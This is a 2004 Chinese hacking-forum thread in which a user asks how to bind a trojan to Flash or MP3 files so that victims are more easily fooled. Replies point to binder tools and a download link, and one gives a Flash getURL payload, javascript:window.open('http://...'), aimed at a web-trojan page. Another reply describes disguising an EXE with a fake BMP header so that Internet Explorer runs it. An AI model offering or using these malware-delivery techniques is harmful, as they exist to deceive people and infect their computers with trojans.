20CN网络安全小组论坛 - 菜鸟乐园 - 有什么方法能把木马捆绑到flash文件上吗？

论坛: 菜鸟乐园标题: 有什么方法能把木马捆绑到flash文件上吗？

复制本贴地址

作者: jasonye [jasonye]

论坛用户

有什么方法能把木马捆绑到flash文件上吗？或者是MP3.这样比较好骗人

地主发表时间: 04-01-01 15:41

回复: orangeman [orangeman]

论坛用户

用捆绑器呀。

B1层发表时间: 04-01-01 20:11

回复: cantfindme [cantfindme]

论坛用户

能否介绍一个 ^_^

B2层发表时间: 04-01-01 22:13

回复: zintaly [zintaly]

论坛用户

同样的我问题!顶一下

B3层发表时间: 04-01-01 22:18

回复: afan271314 [afan271314]

论坛用户

这样的软件太多了

B4层发表时间: 04-01-01 22:18

回复: abctm [abctm]

版主

不可能的

[此贴被日月双星[NG](abctm) 在 01月02日12时24分编辑过]

B5层发表时间: 04-01-01 22:21

回复: afan271314 [afan271314]

论坛用户

楼上的我可知道你的星是怎么来的了

B6层发表时间: 04-01-01 22:23

回复: jasonye [jasonye]

论坛用户

我用的捆绑器最后都是生成exe文件的.不能是swf或者Mp3很多人看见了都不会上当的.

B7层发表时间: 04-01-02 00:57

回复: jasonye [jasonye]

论坛用户

能介绍一个给小弟吗？最后生成的文件要是swf或者mp3的.因为我有用过好多捆绑器.不过最后生成的都是exe文件!

B8层发表时间: 04-01-02 00:58

回复: aassddff [aassddff]

论坛用户

http://download.enet.com.cn/file/fmanager/other/2001121913.shtml

B9层发表时间: 04-01-02 01:00

回复: lijingxi [lijingxi]

见习版主

捆绑以后的文件是exe的!不能捆绑的swf 或者mp3　这样的扩展名的
但是你可以　把flash里面写程序语言　　在里面调用某一个网页　　然后做网页木马
　这样不就可以了么？

B10层发表时间: 04-01-02 02:07

回复: jasonye [jasonye]

论坛用户

谢谢斯文败类！！

B11层发表时间: 04-01-02 11:35

回复: q70213526 [q70213526]

版主

这样啊！

B12层发表时间: 04-01-02 14:03

回复: zybzc [zybzc]

论坛用户

我们打开flashmx来制作一个swf文件，
在动作里加上geturl
将下面的代码插入里面，然后输出即可！

javascript:window.open('http://.........')
这里的地址是你的网页木马的地址！

B13层发表时间: 04-01-02 16:57

回复: kafeiwuyu [kafeiwuyu]

论坛用户

用伪装文件头方法，就是将EXE伪装成BMP，这样别人中了都不知道

你那样网页木马太暴露

最致命的是可以欺骗IE，因为图片在IE里可以直接显示！

[此贴被咖啡屋语(kafeiwuyu) 在 01月02日17时21分编辑过]

B14层发表时间: 04-01-02 17:19

回复: yufirst [yufirst]

论坛用户

楼上的，虽然欺骗了IE，但是以图片形式打开的话，能算运行EXE吗？

疑问

B15层发表时间: 04-01-02 17:26

回复: zybzc [zybzc]

论坛用户

当然可以你把做的木马FLASH传到别人论坛上人家浏览都会中木马的
除非打了补丁

B16层发表时间: 04-01-02 17:32

回复: kafeiwuyu [kafeiwuyu]

论坛用户

废话啊，当然运行EXE了，不然图片木马怎么来的

B17层发表时间: 04-01-02 17:33

回复: kafeiwuyu [kafeiwuyu]

论坛用户

BMP文件头指定了BMP文件的大小类型等。
用编程方法将此编辑到EXE程序里去，那就会骗过IE，但实际已经下载木马执行
绝对可以的，除非哪个禁止了IE的图片显示功能（一般不可能的）
你去网上搜下，一定能找到关于图片木马的文章

B18层发表时间: 04-01-02 17:35

论坛: 菜鸟乐园